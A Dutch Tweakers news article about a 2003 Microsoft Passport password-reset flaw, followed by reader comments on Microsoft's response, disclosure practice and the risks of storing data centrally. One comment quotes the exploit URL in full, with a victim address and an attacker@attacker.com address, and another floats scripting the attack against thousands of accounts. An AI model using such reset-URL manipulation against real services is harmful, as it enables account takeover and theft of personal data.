Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Door , , 83 reacties
Bron: News.com, submitter: T.T.

Een Pakistaanse beveiligingsadviseur heeft gisteravond op de beveiligingslijst 'Full Disclosure' informatie vrijgegeven over een ernstige beveiligingsfout in Microsoft's Passport-service. De fout in de beveiliging bestaat al lange tijd en heeft tot gevolg dat onbekenden het wachtwoord van een willekeurig account kunnen resetten. Hierdoor komt de persoonlijke informatie die in het Passport-account te vinden is vrij, waaronder creditcard-nummers. Het gemak waarmee accounts gereset kunnen worden en het belang van de informatie die in Passport accounts opgeslagen wordt, maakt de fout tot een kritiek probleem. Nog geen vier uur nadat de informatie vrijgegeven was, had Microsoft de mogelijkheid om wachtwoorden te resetten centraal geblokkeerd, om misbruik te voorkomen. Wachtwoorden konden gereset worden door de URL aan te passen die gebruikt wordt om een wachtwoord reset op te vragen:

Microsoft Passport logoThe flaw allowed a single Web address--or URL--to be used to request a password reset from the Passport servers. The URL contains the e-mail address of the account to be changed and the address where the attacker would like to have the reset message sent. By entering the single line into a Web browser an attacker can cause the Passport servers to return a link that allows an account's password to be reset. By following the link returned in the message, the attacker can change the password for the victim's account.
Moderatie-faq Wijzig weergave

Reacties (83)

Wachtwoorden konden gereset worden door de URL aan te passen die gebruikt wordt om een wachtwoord reset op te vragen:
Ik mag toch wel aannemen dat MS dit soort dingen zelf ook probeerd voor ze iets public maken, het aanpassen van een URL om uit te testen of iets kan doet volgens mij iedereen wel een keer.

En vooral de mensen die zelf actief met bijvoorbeeld ASP of PHP bezig zijn weten meestal wel wat ze moeten proberen om er resultaat uit te halen, met deze ontdekking als gevolg.

Echt nalatig van MS dat ze dit niet getest hebben, het is netjes dat het binnen 4 uur is opgelost maar deze feature, je kan het geen bug noemen, had er nooit in mogen zitten.
Dit is absoluut WEL een bug. Het is onzin dit af te doen met 'feature' of 'niet zo erg' (wat je daarmee suggereert). Sterker nog, elke programmeerfout is in principe een bug en dit daarmee dus ook.

Het is idd een beetje jammer dat juist op dit soort punten fouten gemaakt worden, maar de fouten die ermee gemaakt worden zijn niet altijd triviaal te zien of te vinden.
Dit is geen bug. Een bug is als hij het wachtwoord niet reset. Dit is een feature omdat de functionaliteit op een andere manier oneigenlijk gebruikt kan worden. Dit is een missende beveiliging, maar geen bug.
Het is eigenlijk weer dezelfde fout als die gemaakt was toen je een willekeurig hotmail bericht kon lezen door de URL aan te passen. Dat was eigenlijk net zo'n stomme fout, maar toch iets minder 'kritiek' dan deze.
Dat ze het zelf uittesten, is logisch. Dat er vervolgens fouten uitkomen die men niet heeft gezien in de tests, ook. Dit systeem wordt zo massaal gebruikt, dat het onmogelijk is om dit soort praktijken te voorkomen. Het zal dan ook nooit perfect worden (zoals geen enkel systeem met zoveel gebruikers). Het perfect veilige & stabiele systeem blijft een utopie.
Het perfect veilige & stabiele systeem blijft een utopie.
Dat kan wel zo zijn, maar dit is al de tweede keer dat er een ernstig security probleem is met Microsofts Passport service. Dat is gewoon een uiterst slechte score voor een project dat nog niet zo oud is maar welke security als allerhoogste prioriteit hoort te hebben.

Bovendien is dit type fout (niet checken op input-waarde maar de gegevens uit de URL meteen doorspelen aan een database query) een typische beginnersfout. Dat geeft aan dat de code (of dit gedeelte althans) niet door een competente programmeur geschreven is en niet door competente mensen is gecontroleerd op security issues. Het is gewoon slecht dat Microsoft zulke programmeurs op zo'n security-gevoelig project zet.

En natuurlijk, mensen zijn en blijven mensen, en fouten worden gemaakt... Maar als je de resources van Microsoft hebt en zo'n security-gevoelig project begint, dan heb je ook de plicht om de code te laten auditen door grote hoeveelheden ingenieurs, iets wat blijkbaar dus niet of niet afdoende is gebeurd.
haha, dat klopt.. Maar deze fout is wel HEEL dom. Kom op zeg, dit is echt te triviaal voor woorden. Is nogal een pruts programmeur geweest die dit gebouwd heeft..

Overigens ging deze bug al maanden rond over Internet, heb er een paar weken geleden al e.e.a. over gehoord, boeide me toen niet zo, Hotmail kan mij redelijk gestolen worden. Nam verder aan dat als iedere jandoedel wist hoe je bij hotmail het account van je ex kon resetten dat er dan ook al wel iemand dat probleem bij MS gemeld heeft.

Echt _enorm_ slecht dat dit niet eerder opgelost is, echt ongeloofelijk dit :roll: Je haalt zo'n adres toch gewoon uit de accounts DB? Toch niet uit een URL :? Ik mag hopen dat er nu iemand ontslagen wordt bij MS ;)
Hotmail kan mij redelijk gestolen worden.
Misschien, maar het gaat niet om hotmail.. Het gaat om passport, iets wat ik ook moest aanmaken omdat ik anders bij microsoft onze licenties niet beheren.
Wat we ook moesten aanmaken omdat we MSDN lid zijn, er staan toch een boel gegevens in zo'n account.

Daarbij word passport verkocht als een eenmalig en veilig account om al je gegevens in te bewaren zodat je op verschillende websites niet steeds op nieuw je gegevens hoeft in te vullen (inclusief creditcard gegevens).

Misschien dat dit jouw niet boeit, maar mij wel.
Helaas heb ik zo'n passport account nodig (al staat er weinig bijzonders in) dus ben ik hier niet blij mee.
Je haalt zo'n adres toch gewoon uit de accounts DB? Toch niet uit een URL Ik mag hopen dat er nu iemand ontslagen wordt bij MS
Natuurlijk wordt de info uit een database gehaald, daar ligt de oorzaak van het probleem ook helemaal niet.

Het is (was) mogelijk om in de URL een of andere query in te typen die ervoor zorgde dat je als gebruiker data uit de database kon halen.

Daarom vind ik het ook zo'n domme bug, iedereen die een beetje actief is met scripttalen weet dat dat de meest voorkomende fout is, dat het aanpassen van een URL ook daadwerkelijk wordt uitgevoerd i.p.v. dat de hacker/cracker een mooie foutmelding tegenkomt.
Dit systeem wordt zo massaal gebruikt, dat het onmogelijk is om dit soort praktijken te voorkomen.

Deze issue is voor webdevelopers echt een standaard iets dat je altijd hoort te checken! De fout komt zeer vaak voor, o.a. op www.times.com was een tijd geleden hetzelfde mogelijk, maar dat dit nooi gecheckt is door Ms, is erg nalatig. Ikzelf check altijd dubbel, aan een geencrypted userid en aan de sessieid, kan nooit misgaan dacht ik als je dan iets in de URL veranderd...
Echt nalatig van MS dat ze dit niet getest hebben, het is netjes dat het binnen 4 uur is opgelost maar deze feature, je kan het geen bug noemen, had er nooit in mogen zitten
wat je zegt klopt niet,ze hebben het nl nog niet opgelost,maar ze hebben de mogelijkheid globaal afgesloten,en ze zullen nu op zoek zijn naar de oplossing,tis wel weer eens wat anders om te lezen dat microsoft meteen reageerd
Echt nalatig van MS dat ze dit niet getest hebben, het is netjes dat het binnen 4 uur is opgelost maar deze feature, je kan het geen bug noemen, had er nooit in mogen zitten.
het centraal blokkeren van password resets noem ik niet echt een oplossing hoor, dan kan dus niemand zijn paswoord resetten.

edit:
floeps dubbelpost] dacht dat ik alle reacties op die post al gezien had :S
Ik heb het volledige bericht gezelen en wat daar bij stond wordt je niet zo blij. Dat de ontdekker al meerdere mails zonder enige reactie had gestuurd naar Hotmail om hun te attenderen op het "probleem" en dat er pas werd ingerepen nadat het publiekelijk bekend werd gemaakt
Dan moet je wel even eerlijk blijven:
The security consultant also said that he had repeatedly sent e-mail warnings to Microsoft's abuse and security addresses at Hotmail.com to no avail. However, he didn't send an e-mail to Microsoft's standard security contact point, secure@microsoft.com.
Het was handiger geweest als hij ook een mailtje naar secure@ms had gestuurd. Anderzijds zou iedereen binnen MS zulke mail moeten doorsturen naar dat adres. Negeren omdat het eigenlijk ergens anders heen moet is hier duidelijk geen optie.
Waar op de hotmail website kan je vinden dat security issues naar secure@microsoft.com moeten worden gestuurd? Wat er het dichtst bij komt als ik rond kijk via "all about hotmaiul" en "contact us" op die site is abuse@hotmail.com. Standaard zou je denken dat er ook een adres postmaster@hotmail.com zal bestaan, ook iets wat toch te proberen is als je iets wilt melden over problemen met een mail-dienst. En inderdaad, binnen de organisatie hoort men dan te weten aan wie een mail doorgestuurd moet worden over zo iets, dat is niet de schuld van de ontdekker van dit gat.
Dit ben ik volstrekt met je oneens.
De beste man had kontakt proberen te leggen dat dit niet naar het juiste adres is gegaan is dan jammer.
Als er zo'n bericht komt waarvandaan dan ook reageer je onmiddelijk.
Ook al is dit op het verkeerde adres dan hadden de jongens en meisjes van hotmail dit direkt moeten doorspelen naar het adres dat je noemt.
Zeker als je zo hoog opgeeft over je eigen sequrety poitiek.

Al met al vind ik jouw reden om niet te reageren alleen maar aangeven dat de cursus in sequrity die velen bij MS krijgen nog niet overal is aangeslagen.
Als je eens bedenkt hoeveel mailtjes ze daar per dag (of misschien beter gezegd per uur) binnenkrijgen, zelfs buiten alle spam om, dan vind ik dat ze best snel gereageerd hebben.

In mijn ervaring zijn er maar weinig grote bedrijven die binnen een paar uur op je e-mail reageren, laat staan dat ze dan al aktie hebben ondernomen.

Bovendien moet iedere melding die ze krijgen eerst geannaliseerd worden op juistheid. Er zit daar echt niet iemand achter een pctje die bij elke e-mail die binnenkomt gelijk maar even een deel van het systeem platgooit.
In mijn ervaring zijn er maar weinig grote bedrijven die binnen een paar uur op je e-mail reageren, laat staan dat ze dan al aktie hebben ondernomen.
Microsoft is het IT bedrijf dat veruit het meeste geld van alle IT bedrijven verdient. Je zou verwachten dat Microsoft dus het geld heeft om het beter te doen dan alle andere bedrijven, om meer mensen aan te nemen om alle mail goed af te handelen.

Jij zegt hier dus eigenlijk letterlijk dat Microsoft een bedrijf is als elk ander.

Well, de ene keer zegt Microsoft dat ze het beste bedrijf zijn dat er is, maar als ze een fout maken, zijn ze ineens een bedrijf als elk ander.

Dat heeft een term: 'hypocriet'.

Laat Bill Gates eens iets minder geld in zijn eigen zak stoppen en een fatsoenlijke helpdesk opzetten. Het zou tijd worden...

Toen de mail eindelijk bij de juiste persoon aan kwam was er binnen 4 uur gereageerd. Sja, maar het heeft 30 dagen geduurd voordat die mail ueberhaupt bij de juiste persoon aan kwam. Die 4 uur is dus doodgewoon bullshit, het was in feite 724 uur voordat ze reageerden omdat ze doodgewoon vet onderbezet waren op de mail-adressen die gebruikt werden. Daar is geen enkele reden toe, want Microsoft verdient geld zat.

Bedenk wel dat, zoals het er nu naar uitziet, Microsoft onze toekomst gaat bepalen. Ik vind dat je best kritisch mag zijn op een bedrijf dat de pretenties heeft om de toekomst van de hele wereld te bepalen.
Bedenk wel dat, zoals het er nu naar uitziet, Microsoft onze toekomst gaat bepalen. Ik vind dat je best kritisch mag zijn op een bedrijf dat de pretenties heeft om de toekomst van de hele wereld te bepalen.
Precies.. nu even omschakelen naar paranoia modus.

Dit lek komt precies op het door MS bepaalde moment naar buiten dat palladium gepresenteerd wordt op winHEC. Zodra palladium geimplementeerd wordt zal passport zowiezo drastisch van structuur moeten gaan veranderen om 'trusted' te worden.

De wereld is op dit moment goed doordrongen van het feit dat passport erg onveilig is.

Ik voorspel dat MS zeer binnenkort komt met een nieuw palladium passport systeem dat ze als veilig gaan verkopen en dat de wereld het gaat slikken..

komt dus best goed uit voor MS...

[/paranoia] :)
Ik had het vanmorgen al gelezen.

Zie hier voor meer informatie :

http://lists.netsys.com/pipermail/full-disclosure/2003-May/009593.html
Hotmail & Passport (.NET Accounts) Vulnerability

There is a very serious and stupid vulnerability or badcoding in Hotmail / Passports (.NET Accounts)

I tried sending emails several times to Hotmail / Passport contact addresses, but always met with the NLP bots.

I guess I don't need to go in details of how cruical and important Hotmail / Passports .NET Account passport is to anyone.

You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not.

It is so simple that it is funny.
Wat moet ik me bij een "NLP bot" voorstellen?

Heeft hij nou 10 mails gestuurd, die door die bots nooit bij Microsoft zijn aangekomen?

Dat is natuurlijk wel belangrijk om te weten, als je wilt beoordelen of Microsoft adequaat heeft gereageerd.
In mijn ogen ronduit belachelijk. Ik kan best begrip op brengen voor programmeerfouten die soms zelfs security problemen met zich mee brengen. Echter voor Passport is overduidelijk dat security hier een hoofdrol moet spelen in de ontwikkeling, maar dit blijft bij grote commerciele bedrijven (waaronder Microsoft) altijd een probleem lijkt het.

Dat het ook nog eens voor de eindgebruiker doorzichtig genoeg is zodat die kan zien dat het aanpassen van een URL genoeg is om een password-reset aan te vragen maakt het helemaal een beschamende bug. Er is blijkbaar geen in-house hacker aan de slag geweest om de security van Passport te testen, anders komt zoiets wel naar boven.
Zeer ernstig. Zeker omdat passport in de visie van MS een zeer centrale rol speelt in de internet identiteit van de gebrukers.

Het lijkt me dat passport zoals het er nu uitziet ongeschikt is voor opslag van gevoelige informatie. Behalve dat je erover kan discussieren of het verstandig is om je gegevens te laten beheren door een commercieel bedrijf zijn er meer dingen.

Het belangrijkste argument is dat de structuur van passport niet transparant is. Niemand behalve MS weet hoe je gegevens nu precies opgeslagen zijn. Hoe de beveiliging in elkaar zit, enzovoort..

Wil MS een betrouwbare online identiteit bieden voor users dan zullen ze met een transparant, het liefst open source alternatief moeten komen. Dat is imho de enige manier om een dienst te bieden die het vertrouwen kan winnen van gebruikers.

Geen wonder dus dat MS nu ineens binnen 4 uur de boel op slot gooit [!], let wel: dit is een paniekreactie en geeft de ernst van de fout aan. Feitelijk kunnen nu mensen die hun wachtwoord vergeten zijn niet meer van passport/hotmail gebruik maken.
Daarom ben ik er falikant op tegen dat bijna alle gegevens centraal worden opgeslagen zoals Microsoft dat zo graag wil met hun Passport Service (en toekomstige rariteiten).

Er hoeft maar *iets* niet goed te zitten en horden gegevens kun je zo bemachtigen.

Liggen die gegevens "gewoon" bij je thuis, of nog beter, in je hersentjes, en een individu *komt* erachter, dan is in princiepe niet veel aan de hand, want dan gaat het maar om 1 enkel geval.

Ieder z'n mening, maar ik vind 't maar niks :)
Voor een duidelijkere omschrijving kan je hier terrecht. Zie hieronder de quote (plus de vertaling) van de uitleg:
Het enige wat je hoeft te doen is de volgende URL's intikken in je webbrowser:

https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotm ail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

Als je dat dan doet krijg je een e-mail op het adres: attacker@attacker.com waarin je wordt gevraagd om op een URL te klikken. Deze ziet er dan ongeveer zo uit.

http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&UR LNum=0&lc=1033

En vanaf deze URL kan je dan het wachtwoord van het slachtoffer aanpassen.
Eigenlijk is het niet echt hacken, maar mijn inziens valt dit onder creatief surfen...
punt 1... zie mijn post hier ver boven...
punt 2... wie heeft het over hacken? het gaat hier over een lek, en niet over een hacker...
eeek

smijt een DB van een reclame/spam bureau ff in een batchfile en je hebt direct tienduizenden accounts ter beschikking
richtte MS geen speciale "secure programming courses" in voor zijn personeel en studenten :?
Ja, maar dat heeft misschien geen betrekking op dat Passportgebeuren, maar vooral op software en besturingssystemen voor gebruikers (en bedrijven).
Op zich wel netjes dat microsoft het binnen 4 uur opgelost heeft, voor het zelfde geld hebben ze zoiets van; we wachten wel tot morgen ochtend. Ben alleen wel benieuwd hoeveel creditcard info ze nu hebben weten te bemachtigen...
Snell opgelost? Niet dus, de ontdekker had al tien mailtjes gestuurd en toen was er nog niet gereageerd... :)
Hij had dan wel 10 mailtjes gestuurd naar allemaal adressen, niet eentje daarvan was naar secure@microsoft.com - hét adres om bugs en aanverwanten te melden.
Het lijkt mij dat als je 10 mailtjes stuurt ze intern niet zomaar zeggen van: ¨mailtje hoort niet bij deze afdeling, laten we het maar weggooien¨
The security consultant also said that he had repeatedly sent e-mail warnings to Microsoft's abuse and security addresses at Hotmail.com to no avail.
Ik vraag me dan af waar die abuse en security adressen dan voor zijn bij hotmail? Als ik een security fout vind bij een site dan stuur je toch de berichten daarover naar de betreffende beheerder(s) en niet naar het grote moederbedrijf wat erachter zit :?
Ze hebben het nog niet opgelost. alleen de mogelijkheid om te resetten centraal geblokkeerd.
Je bent gewoon dom dat je credit card gegevens in je .NET passpoort zet.
Ze hebben niets opgelost, ze hebben het systeem 'op slot' gedraaid. Legitieme gebruikers kunnen dus ook hun password niet meer resetten totdat MS een echte oplossing heeft.
gebruikers konden het wachtwoord nog nooit een reset commando geven, wel wijzigen. De support van .Net passport die resette het wachtwoord.
Opgelost zou ik het niet noemen, ze hebben de boel gewoon geblokkeerd. Ik moet je wel gelijk geven dat het bewonderenswaardig is dat MS zo snel reageert.

Al een gelukt dat ze de mogenlijkdeid hebben om de boel te blokkeren, nu kunnen ze iets rustiger (lees: grondiger) aan een oplossing werken

EDIT: ben precies niet de enige die er zo over denkt

REACTIE op player-x: als je leest wat er staat dan zie je dat MS reageerde 4 uur nadat het probleem bekent is gemaakt, dus je vergelijking gaat niet op
De fout in de beveiliging bestaat al lange tijd en heeft tot gevolg dat onbekenden het wachtwoord van een willekeurig account kunnen resetten

bewonderenswaardig kan ik dit nu ook weer niet noemen eerder lui

zo iets als hhmm water staat wel hoog aan de dijk moeten we maar eens rustig over na gaan denken hoe dit is op te lossen gaat wel goed zo

hey het water stroomt er over heen moeten we als de wiedde weer zand zakken gaan plaatsen HELP gooi de sluizen open

lijkt meer op wat er gebeurd is
Het is niet eens opgelost... ze hebben het gewoon uit gezet, niemand kan nu zijn password meer resetten totdat het daadwerkelijk is opgelost ;)
Dit is nu precies waar men de hele tijd voor gewaarschuwd heeft. Centraal opslaan heeft gewoon als nadeel dat er bij een lek of een bug, alle gegevens op straat komen te liggen.
Je zult als bedrijf maar gevoelige gegevens opgeslagen hebben zoals MS dat graag wil.
Vanzelfsprekend een zeer domme bug.
Dit is nu precies waar men de hele tijd voor gewaarschuwd heeft. Centraal opslaan heeft gewoon als nadeel dat er bij een lek of een bug, alle gegevens op straat komen te liggen.
En als je Credit Card informatie bij alle websites staat opgeslagen waar je ooit online iets hebt gekocht is veiliger ????

Centraal opslaan kan juist veel veiliger zijn. Er hoeft tenslotte dan maar 1 systeem dicht te zijn....

Maar goed, ik denk dat eerder het credit card systeem aangepast moet worden. Alleen nog maar gebruik maken van 1 malig geldige nummers. (die kaarten zijn er immers al...)

Hoeft er ook niks echt belangrijks opgeslagen te worden...
En als je Credit Card informatie bij alle websites staat opgeslagen waar je ooit online iets hebt gekocht is veiliger ????
Dat is waarschijnlijk wel een betere situatie. Als een site security-problemen vertoont, dan hebben gebruikers de keuze om die site te mijden. Sites die als "onveilig" bekend staan verliezen op die manier ook nog eens inkomsten, en hebben dus een motivatie om hun veiligheid op orde te brengen.

Die keuze heb je als gebruiker niet als er maar één centraal systeem is.
Centraal opslaan kan juist veel veiliger zijn. Er hoeft tenslotte dan maar 1 systeem dicht te zijn....
Maar dan moet dat systeem wel dicht zijn. Bovendien is zijn de gevolgen als het mis gaan veel groter.

Overigens ben ik van mening dat je belangrijke gegevens (zoals creditcardnummers) gewoon niet online rond moet strooien, centraal opgeslagen of niet.
Maar goed, ik denk dat eerder het credit card systeem aangepast moet worden. Alleen nog maar gebruik maken van 1 malig geldige nummers. (die kaarten zijn er immers al...)
Eens, het huidige creditcard-systeem is gewoonweg achterlijk. Zodra je het creditcard-nummer (plus wat extra gegevens zoals expiration date?) van iemand weet kun je spullen op zijn rekening kopen |:(
1 kleine aanmerking op je post:
Als een site security-problemen vertoont, dan hebben gebruikers de keuze om die site te mijden.
Das nu net het probleem, dat weet je pas als je gegevens misbruikt worden. Ik weet in elk geval niet welke van de miljoenen sites die CC betaling accepteren nu wel of niet veilig zijn....

Voor de rest ben ik het helemaal met je post eens ..
Das nu net het probleem, dat weet je pas als je gegevens misbruikt worden. Ik weet in elk geval niet welke van de miljoenen sites die CC betaling accepteren nu wel of niet veilig zijn....
Maar in het geval van een centraal systeem (zoals MS Passport) merk je het ook pas als het te laat is. Dat is een vaak zo: een probleem bemerk je pas als het te laat is (anders is het niet zozeer een probleem meer) ;)

Op dit item kan niet meer gereageerd worden.



Apple iOS 10 Google Pixel Apple iPhone 7 Sony PlayStation VR AMD Radeon RX 480 4GB Battlefield 1 Google Android Nougat Watch Dogs 2

© 1998 - 2016 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Carsom.nl de Persgroep Online Services B.V. Hosting door True